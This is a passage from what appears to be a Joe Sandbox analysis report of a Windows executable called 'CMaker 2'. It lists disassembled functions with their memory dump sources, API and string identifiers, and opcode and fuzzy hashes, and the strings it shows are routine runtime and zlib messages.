                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2227656907-0
                                                                                                                                                                                  • Opcode ID: 58e3c91b6142067eeee0e522e8a8604c9ebd6759ac92f6b05f128d6b9fdf1f90
                                                                                                                                                                                  • Instruction ID: 322b19d1c11ebc6131e38ace58e48e1b45154e7484a475e23d55f8037a77ad21
                                                                                                                                                                                  • Opcode Fuzzy Hash: 58e3c91b6142067eeee0e522e8a8604c9ebd6759ac92f6b05f128d6b9fdf1f90
                                                                                                                                                                                  • Instruction Fuzzy Hash: F5B1D5A6B1868281EB64DB65E4001BAA3B0EF44FE4F44A275DA6DC7BC5FE3CE541C300
                                                                                                                                                                                  Function 00007FF6FABE1ED0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                                                                  • String ID: %ls: %ls$<FormatMessageW failed.>
                                                                                                                                                                                  • API String ID: 3479602957-1483686772
                                                                                                                                                                                  • Opcode ID: ce471f065344242f80e8e4fce995234d15c7919f1d37abcf6bc16450676127a6
                                                                                                                                                                                  • Instruction ID: 1eab5eae25e192c39ad60680f2919d8a5668a82677ba4121e2168660e23f8bd4
                                                                                                                                                                                  • Opcode Fuzzy Hash: ce471f065344242f80e8e4fce995234d15c7919f1d37abcf6bc16450676127a6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B119EA2B08B4185E7109B52F8007AA6660BF89BC4F484175EE9D877AAEF3CD5458740
                                                                                                                                                                                  Function 00007FF6FABEB480 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                  • Opcode ID: c5f1a451cea918b3d295fbd489f38e5bd1b238518de27717531c6a83961092e0
                                                                                                                                                                                  • Instruction ID: 2b74d2cd3a17fe161126b648920d5fd9407b83312d6fe739ee151535b486d9be
                                                                                                                                                                                  • Opcode Fuzzy Hash: c5f1a451cea918b3d295fbd489f38e5bd1b238518de27717531c6a83961092e0
                                                                                                                                                                                  • Instruction Fuzzy Hash: C0111862B14F058AEB00CB60E8542B833B4FB19758F441E35DA6DC67A4EF78E1548340
                                                                                                                                                                                  Function 00007FF6FAC03A10 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy_s
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1502251526-0
                                                                                                                                                                                  • Opcode ID: 57a8bb62846f71c15516153ffb7b4828fa003a6834a4406426bc392e6d140f03
                                                                                                                                                                                  • Instruction ID: 3839d95378488cfe6913696fae5606bf12ddd2708c3c1ccc6a859f22ea3687a5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 57a8bb62846f71c15516153ffb7b4828fa003a6834a4406426bc392e6d140f03
                                                                                                                                                                                  • Instruction Fuzzy Hash: 28C1F6B2B1868587D724CF19A04866AB7A1F794B84F45E235DB6EC7784EF3DE801CB40
                                                                                                                                                                                  Function 00007FF6FABE88EB Relevance: 4.1, Strings: 3, Instructions: 397COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                  • API String ID: 0-1127688429
                                                                                                                                                                                  • Opcode ID: 1d902e8f901c38a96aeb86b43eb5ceac74d2cfcee7f470a0dea70dadb94eeeae
                                                                                                                                                                                  • Instruction ID: 1f275499f9c94d0dccef4509fd23f4b81891eea8dd57abf00461738a4d02da2d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d902e8f901c38a96aeb86b43eb5ceac74d2cfcee7f470a0dea70dadb94eeeae
                                                                                                                                                                                  • Instruction Fuzzy Hash: 69F18072A187D58BE7A58B14C0C8A3A7AE9FF46740F4555F8EA69873D0EF38E940C740
                                                                                                                                                                                  Function 00007FF6FAC09808 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 15204871-0
                                                                                                                                                                                  • Opcode ID: f2e3f23937f2a68c93e747974962f69d529cdec0ec74e941ed306e0113d88ba4
                                                                                                                                                                                  • Instruction ID: 8e09f5b600b5e5876bdbfcc0558973369eba2abbd75c9f5ed0951ce9807a0ef8
                                                                                                                                                                                  • Opcode Fuzzy Hash: f2e3f23937f2a68c93e747974962f69d529cdec0ec74e941ed306e0113d88ba4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DB128B7A04B898AEB15CF29C8863687BB0F784B48F14D961DAADC77A4DF39D451C700
                                                                                                                                                                                  Function 00007FF6FABF32F0 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $
                                                                                                                                                                                  • API String ID: 0-227171996
                                                                                                                                                                                  • Opcode ID: a7bf39730b2c182d9b52e27ba2ba57ef23e99f5aa1b821fca8ab5d1831919a4a
                                                                                                                                                                                  • Instruction ID: f87e0309df4cd3c20d199a72c71196c6f88e3d8ad012c46b44553ebb01f0c6b2
                                                                                                                                                                                  • Opcode Fuzzy Hash: a7bf39730b2c182d9b52e27ba2ba57ef23e99f5aa1b821fca8ab5d1831919a4a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CE1B57AA0864682EB69CE65845013D33A0FF46B48F9C5279DE7E8B7D4EF29E851C700
                                                                                                                                                                                  Function 00007FF6FABE874B Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: incorrect header check$invalid window size
                                                                                                                                                                                  • API String ID: 0-900081337
                                                                                                                                                                                  • Opcode ID: bc24f6c5e24477ccd4c15fe8def47b66156c7834ca1ef16c1479b41b30bebea5
                                                                                                                                                                                  • Instruction ID: 46bd9e3891257424e51a63e7d0908b71614ba45432898b900638d2d9d7e6cf73
                                                                                                                                                                                  • Opcode Fuzzy Hash: bc24f6c5e24477ccd4c15fe8def47b66156c7834ca1ef16c1479b41b30bebea5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6891C972A186D687E7A58B14D4C8A3E3AADFF46340F5141F9DA69C67D0EF38E544CB00
                                                                                                                                                                                  Function 00007FF6FABFDD38 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: e+000$gfff
                                                                                                                                                                                  • API String ID: 0-3030954782
                                                                                                                                                                                  • Opcode ID: bfe0f1466ff7f7ecb7ec295dd737c4642cfb5e3859abd1c999ff2cb22516b14b
                                                                                                                                                                                  • Instruction ID: 3fac722f079775621a1b12ac5762cf100c0c8e9130aec8ab27583cdb86a128ef
                                                                                                                                                                                  • Opcode Fuzzy Hash: bfe0f1466ff7f7ecb7ec295dd737c4642cfb5e3859abd1c999ff2cb22516b14b
                                                                                                                                                                                  • Instruction Fuzzy Hash: E551893AB182C546E7248F7598007697B91E756B98F8CC279CB7887AC5EF3DD0418700
                                                                                                                                                                                  Function 00007FF6FABFD8A4 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: gfffffff
                                                                                                                                                                                  • API String ID: 0-1523873471
                                                                                                                                                                                  • Opcode ID: cf4a6b258e0559303b3c475f79c1c5a3bd9e8d2fcac4499dc9c5272fbf1ab9c6
                                                                                                                                                                                  • Instruction ID: ac1d00ff20c934f9ce5616b78e1c36bb941316b54d73b851dcf12351db25e763
                                                                                                                                                                                  • Opcode Fuzzy Hash: cf4a6b258e0559303b3c475f79c1c5a3bd9e8d2fcac4499dc9c5272fbf1ab9c6
                                                                                                                                                                                  • Instruction Fuzzy Hash: A0A15566A0C7C646EB21CF65A0407A97B90AB52B88F488076DFAD877C5FE3DD501C740
                                                                                                                                                                                  Function 00007FF6FABF8350 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: TMP
                                                                                                                                                                                  • API String ID: 3215553584-3125297090
                                                                                                                                                                                  • Opcode ID: 3d06e942db0d0aa61c0853d5b86f42f8db5e9f4413fd96033572d36b82d3baf6
                                                                                                                                                                                  • Instruction ID: ec863c8426e9cb76446e85a127bc3e935084604d4a1e4f4b209f0511784366f1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d06e942db0d0aa61c0853d5b86f42f8db5e9f4413fd96033572d36b82d3baf6
                                                                                                                                                                                  • Instruction Fuzzy Hash: FA51C419B0824242FB64ABF755151BA52916F42BC4F8C90BDDE2DC77D6FE3CF4025204
                                                                                                                                                                                  Function 00007FF6FAC03280 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                  • Opcode ID: d9331582f5f8571c5bc5c8c2dd552919138c8d336df64ce569163af01c0c82c8
                                                                                                                                                                                  • Instruction ID: 5655ba7d65433fb2124eaeb63d9e23a3ea5865e706f8bed51c97f1bff9501fce
                                                                                                                                                                                  • Opcode Fuzzy Hash: d9331582f5f8571c5bc5c8c2dd552919138c8d336df64ce569163af01c0c82c8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FB09220E07A8AC2EB4C6F15AC8222523B8BF88710FA890B8C01DC13A0EE2C20A54700
                                                                                                                                                                                  Function 00007FF6FABF2E2C Relevance: .4, Instructions: 374COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9d646e120a13ed5259010d3bfa98d53ebc97bb5ffc6c5d812d83f09c7f86f498
                                                                                                                                                                                  • Instruction ID: 0d7295e755827ef945b20956f20a11d64a5aa735fea5ee5ffda58cf8b444ea16
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d646e120a13ed5259010d3bfa98d53ebc97bb5ffc6c5d812d83f09c7f86f498
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CE1C63AA1824282EB689BA5C14013D67A1FF46B54F9C817DDE3D8B3D9EF39E951C700
                                                                                                                                                                                  Function 00007FF6FABF25F0 Relevance: .4, Instructions: 351COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4ad14dd61e253505c5706a66540999842a22657e44419e18468984a2d200ceed
                                                                                                                                                                                  • Instruction ID: 4edb6958f5e58b9a35fbb970a0e9e5c30cd13d38f996db54f64de5d1b3a3a077
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ad14dd61e253505c5706a66540999842a22657e44419e18468984a2d200ceed
                                                                                                                                                                                  • Instruction Fuzzy Hash: EFE1F47AA0864285F7648AA8C55437C2791EF47B44F9C82BDCE6D872D9EF3DE841C740
                                                                                                                                                                                  Function 00007FF6FABF2A28 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
